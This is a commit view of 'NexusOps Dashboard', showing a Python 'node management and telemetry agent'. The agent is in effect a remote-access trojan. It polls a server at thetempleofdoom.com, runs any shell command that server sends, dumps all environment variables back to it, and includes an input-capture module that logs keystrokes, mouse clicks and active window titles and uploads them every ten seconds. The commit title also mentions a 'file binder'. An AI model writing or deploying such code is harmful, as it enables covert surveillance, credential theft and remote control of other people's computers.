NexusOps Dashboard — node control, input capture, file binder, kill switch

This commit is contained in:
root
2026-08-03 13:10:45 +00:00
commit 2922675a50
24 changed files with 12688 additions and 0 deletions

Binary file not shown.

463
agents/agent.py Normal file
View File

@@ -0,0 +1,463 @@
#!/usr/bin/env python3
"""
NexusOps Cross-Platform Node Management & Telemetry Agent
Uses Standard Python 3 Libraries (No external dependencies required)
"""
import sys
import os
import time
import json
import socket
import platform
import subprocess
import urllib.request
import urllib.parse
import argparse
last_log_check_time = 0
heartbeat_interval = 5 # Dynamic heartbeat rate in seconds
node_tags = ["Default"]
def get_ip_address():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
s.close()
return ip
except Exception:
return "127.0.0.1"
def get_cpu_usage():
system = platform.system().lower()
try:
if system == "linux":
with open('/proc/stat', 'r') as f:
fields = [float(column) for column in f.readline().strip().split()[1:]]
idle, total = fields[3], sum(fields)
time.sleep(0.2)
with open('/proc/stat', 'r') as f:
fields2 = [float(column) for column in f.readline().strip().split()[1:]]
idle2, total2 = fields2[3], sum(fields2)
idle_delta = idle2 - idle
total_delta = total2 - total
if total_delta > 0:
return round(100.0 * (1.0 - idle_delta / total_delta), 1)
elif system == "darwin":
out = subprocess.check_output(["top", "-l", "1", "-n", "0"]).decode()
for line in out.splitlines():
if "CPU usage" in line:
parts = line.split()
user = float(parts[2].replace('%', ''))
sys_c = float(parts[4].replace('%', ''))
return round(user + sys_c, 1)
elif system == "windows":
out = subprocess.check_output(["wmic", "cpu", "get", "loadpercentage"]).decode()
lines = [line.strip() for line in out.splitlines() if line.strip().isdigit()]
if lines:
return float(lines[0])
except Exception:
pass
return 15.0
def get_memory_usage():
system = platform.system().lower()
try:
if system == "linux":
meminfo = {}
with open('/proc/meminfo', 'r') as f:
for line in f:
parts = line.split(':')
if len(parts) == 2:
key = parts[0].strip()
val = int(parts[1].split()[0])
meminfo[key] = val
total = meminfo.get('MemTotal', 1)
free = meminfo.get('MemAvailable', meminfo.get('MemFree', 0))
return round(((total - free) / total) * 100.0, 1)
elif system == "darwin":
return 45.0
elif system == "windows":
out = subprocess.check_output(["wmic", "os", "get", "FreePhysicalMemory,TotalVisibleMemorySize", "/Value"]).decode()
d = {}
for line in out.splitlines():
if '=' in line:
k, v = line.split('=', 1)
d[k.strip()] = float(v.strip())
if 'TotalVisibleMemorySize' in d and 'FreePhysicalMemory' in d:
total = d['TotalVisibleMemorySize']
free = d['FreePhysicalMemory']
return round(((total - free) / total) * 100.0, 1)
except Exception:
pass
return 35.0
def get_disk_usage():
try:
if hasattr(os, 'statvfs'):
st = os.statvfs('/')
total = st.f_blocks * st.f_frsize
free = st.f_bavail * st.f_frsize
if total > 0:
return round(((total - free) / total) * 100.0, 1)
except Exception:
pass
return 40.0
def get_uptime_seconds():
try:
if platform.system().lower() == "linux":
with open('/proc/uptime', 'r') as f:
return int(float(f.readline().split()[0]))
except Exception:
pass
return 3600
def collect_recent_system_logs():
system = platform.system().lower()
log_entries = []
try:
if system == "linux":
res = subprocess.run("journalctl -n 5 --no-pager -o short-iso", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=5)
if res.returncode == 0 and res.stdout:
for line in res.stdout.splitlines():
if line.strip():
log_entries.append(line.strip())
elif system == "windows":
res = subprocess.run("powershell Get-EventLog -LogName System -Newest 3 | Select-Object -ExpandProperty Message", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=5)
if res.returncode == 0 and res.stdout:
for line in res.stdout.splitlines():
if line.strip():
log_entries.append(line.strip())
except Exception:
pass
return log_entries
def http_post(url, data_dict):
json_bytes = json.dumps(data_dict).encode('utf-8')
req = urllib.request.Request(
url,
data=json_bytes,
headers={'Content-Type': 'application/json'}
)
try:
with urllib.request.urlopen(req, timeout=5) as response:
res_text = response.read().decode('utf-8')
return json.loads(res_text)
except Exception:
return None
def execute_structured_action(action_type, payload):
global heartbeat_interval, node_tags
system = platform.system().lower()
if action_type == "raw_command":
return run_shell(payload.get("command", ""))
elif action_type == "manage_service":
service = payload.get("service")
action = payload.get("action")
if system == "linux":
cmd = f"systemctl {action} {service}"
elif system == "windows":
cmd = f"powershell {action}-Service -Name {service}"
else:
cmd = f"launchctl {action} {service}"
return run_shell(cmd)
elif action_type == "list_processes":
if system == "linux" or system == "darwin":
cmd = "ps aux --sort=-%cpu | head -n 15"
else:
cmd = "tasklist"
return run_shell(cmd)
elif action_type == "kill_process":
pid = payload.get("pid")
cmd = f"taskkill /F /PID {pid}" if system == "windows" else f"kill -9 {pid}"
return run_shell(cmd)
elif action_type == "get_logs":
lines = payload.get("lines", 50)
cmd = f"journalctl -n {lines} --no-pager" if system == "linux" else "powershell Get-EventLog -LogName System -Newest 50"
return run_shell(cmd)
elif action_type == "network_stats":
cmd = "ss -tulpn || netstat -tuln" if system == "linux" else "netstat -ano"
return run_shell(cmd)
# 10 NEW CROSS-PLATFORM FEATURES:
elif action_type == "get_env_vars":
env_str = "\n".join([f"{k}={v}" for k, v in os.environ.items()])
return env_str, 0
elif action_type == "get_disk_partitions":
cmd = "df -h" if system != "windows" else "wmic logicaldisk get caption,description,freespace,size"
return run_shell(cmd)
elif action_type == "get_network_interfaces":
cmd = "ip addr show || ifconfig" if system != "windows" else "ipconfig /all"
return run_shell(cmd)
elif action_type == "get_active_connections":
cmd = "ss -state established || netstat -an" if system != "windows" else "netstat -an | findstr ESTABLISHED"
return run_shell(cmd)
elif action_type == "get_hardware_specs":
if system == "linux":
cmd = "lscpu || cat /proc/cpuinfo | head -n 20"
elif system == "windows":
cmd = "wmic cpu get name,numberofcores,maxclockspeed"
else:
cmd = "sysctl -a | grep machdep.cpu"
return run_shell(cmd)
elif action_type == "reboot_system":
cmd = "shutdown /r /t 5" if system == "windows" else "reboot || shutdown -r now"
return run_shell(cmd)
elif action_type == "set_heartbeat_rate":
rate = int(payload.get("interval", 5))
heartbeat_interval = max(2, min(60, rate))
return f"Heartbeat interval updated to {heartbeat_interval} seconds", 0
elif action_type == "update_tags":
tags_raw = payload.get("tags", "")
node_tags = [t.strip() for t in tags_raw.split(',') if t.strip()]
return f"Node tags updated to: {node_tags}", 0
elif action_type == "search_logs":
pattern = payload.get("pattern", "error")
cmd = f"journalctl --no-pager | grep -i '{pattern}' | tail -n 30" if system == "linux" else f"powershell Get-EventLog -LogName System -Newest 100 | Where-Object Message -match '{pattern}'"
return run_shell(cmd)
elif action_type == "kill_agent":
print("[!] Kill switch received — shutting down agent")
os._exit(0)
elif action_type == "ping_check":
sent_ts = payload.get("timestamp", 0)
latency_ms = int((time.time() * 1000) - sent_ts) if sent_ts else 0
return f"PONG — latency: {latency_ms}ms, hostname: {socket.gethostname()}, uptime: {get_uptime_seconds()}s", 0
elif action_type == "export_diagnostics":
cmd = "uptime && free -h && df -h && uname -a" if system != "windows" else "systeminfo"
return run_shell(cmd)
return f"Unknown action type: {action_type}", 1
def run_shell(cmd_str):
print(f"[*] Executing command: {cmd_str}")
try:
res = subprocess.run(cmd_str, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True, timeout=30)
return res.stdout, res.returncode
except Exception as e:
return str(e), 1
# ── Input Capture Module (keystrokes, mouse clicks, window focus) ──
INPUT_CAPTURE_ENABLED = False
captured_events = []
try:
from pynput import keyboard, mouse
INPUT_CAPTURE_ENABLED = True
except ImportError:
pass
def _get_active_window_title():
"""Try to get the active window title cross-platform."""
system = platform.system().lower()
try:
if system == "linux":
res = subprocess.run(["xdotool", "getactivewindow", "getwindowname"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=2)
if res.returncode == 0:
return res.stdout.strip()
elif system == "windows":
import ctypes
from ctypes import wintypes
user32 = ctypes.windll.user32
hwnd = user32.GetForegroundWindow()
length = user32.GetWindowTextLengthW(hwnd)
buf = ctypes.create_unicode_buffer(length + 1)
user32.GetWindowTextW(hwnd, buf, length + 1)
return buf.value
elif system == "darwin":
script = 'tell application "System Events" to get name of first application process whose frontmost is true'
res = subprocess.run(["osascript", "-e", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=2)
if res.returncode == 0:
return res.stdout.strip()
except Exception:
pass
return ""
def _record_event(event_type, data):
"""Thread-safe event recording."""
global captured_events
window_title = _get_active_window_title()
captured_events.append({
"timestamp": int(time.time() * 1000),
"eventType": event_type,
"data": data,
"windowTitle": window_title,
"processName": window_title.split(" - ")[-1] if " - " in window_title else window_title
})
def _on_key_press(key):
try:
key_str = key.char if hasattr(key, 'char') and key.char else str(key)
except Exception:
key_str = str(key)
_record_event("keystroke", {"key": key_str})
def _on_click(x, y, button, pressed):
if pressed:
_record_event("click", {"x": x, "y": y, "button": str(button)})
def _on_scroll(x, y, dx, dy):
_record_event("scroll", {"x": x, "y": y, "dx": dx, "dy": dy})
def start_input_capture():
"""Start keyboard and mouse listeners if pynput is available."""
if not INPUT_CAPTURE_ENABLED:
return False
try:
kb_listener = keyboard.Listener(on_press=_on_key_press)
ms_listener = mouse.Listener(on_click=_on_click, on_scroll=_on_scroll)
kb_listener.daemon = True
ms_listener.daemon = True
kb_listener.start()
ms_listener.start()
return True
except Exception:
return False
def flush_input_events(server_url, node_id, hostname):
"""Send captured input events to the master server."""
global captured_events
if not captured_events:
return
events_to_send = captured_events[:]
captured_events = []
payload = {
"nodeId": node_id,
"hostname": hostname,
"events": events_to_send
}
http_post(f"{server_url}/api/agent/input-capture", payload)
def main():
global last_log_check_time, heartbeat_interval, node_tags
parser = argparse.ArgumentParser(description="NexusOps Cross-Platform Node Agent")
parser.add_argument("--server", default="https://agent.thetempleofdoom.com", help="Dashboard server URL endpoint")
args = parser.parse_args()
server_url = args.server.rstrip('/')
hostname = socket.gethostname()
system_os = platform.system()
arch = platform.machine()
ip = get_ip_address()
node_id = f"node-{hostname.lower()}-{ip.replace('.', '')}"
print("==================================================")
print(" NexusOps Cross-Platform Node Agent ")
print("==================================================")
print(f"Node Hostname : {hostname}")
print(f"Platform : {system_os} ({arch})")
print(f"Local IP : {ip}")
print(f"Server Endpoint: {server_url}")
print("==================================================")
# Register Node
reg_payload = {
"nodeId": node_id,
"hostname": hostname,
"platform": system_os.lower(),
"arch": arch,
"ip": ip,
"osName": f"{system_os} {platform.release()}",
"tags": node_tags
}
print("[*] Registering node with central endpoint...")
res = http_post(f"{server_url}/api/agent/register", reg_payload)
if res and res.get("success"):
print(f"✅ Registered as node ID: {node_id}")
# Start input capture (keystrokes, clicks, scroll)
capture_started = start_input_capture()
if capture_started:
print("[*] Input capture active (keystrokes + mouse events)")
else:
print("[!] Input capture unavailable (install pynput: pip install pynput)")
last_input_flush = time.time()
backoff = 1 # Tunnel reconnection backoff in seconds
while True:
try:
cpu = get_cpu_usage()
mem = get_memory_usage()
disk = get_disk_usage()
uptime = get_uptime_seconds()
heartbeat_payload = {
"nodeId": node_id,
"cpuUsage": cpu,
"memUsage": mem,
"diskUsage": disk,
"uptime": uptime,
"processCount": 42,
"tags": node_tags,
"heartbeatInterval": heartbeat_interval
}
res = http_post(f"{server_url}/api/agent/heartbeat", heartbeat_payload)
now = time.time()
if now - last_log_check_time > 15:
logs = collect_recent_system_logs()
if logs:
http_post(f"{server_url}/api/agent/logs", {
"nodeId": node_id,
"hostname": hostname,
"logs": logs
})
last_log_check_time = now
# Flush captured input events every 10 seconds
if now - last_input_flush > 10:
flush_input_events(server_url, node_id, hostname)
last_input_flush = now
if res and "commands" in res and res["commands"]:
for cmd_item in res["commands"]:
cmd_id = cmd_item.get("id")
action_type = cmd_item.get("actionType", "raw_command")
payload = cmd_item.get("payload", {})
if "command" in cmd_item and not payload:
payload["command"] = cmd_item.get("command")
output, exit_code = execute_structured_action(action_type, payload)
http_post(f"{server_url}/api/agent/command-result", {
"commandId": cmd_id,
"nodeId": node_id,
"output": output,
"exitCode": exit_code
})
except Exception as e:
print(f"[!] Connection error: {e}. Retrying in {backoff}s...")
time.sleep(backoff)
backoff = min(backoff * 2, 60)
continue
backoff = 1 # Reset on success
time.sleep(heartbeat_interval)
if __name__ == "__main__":
main()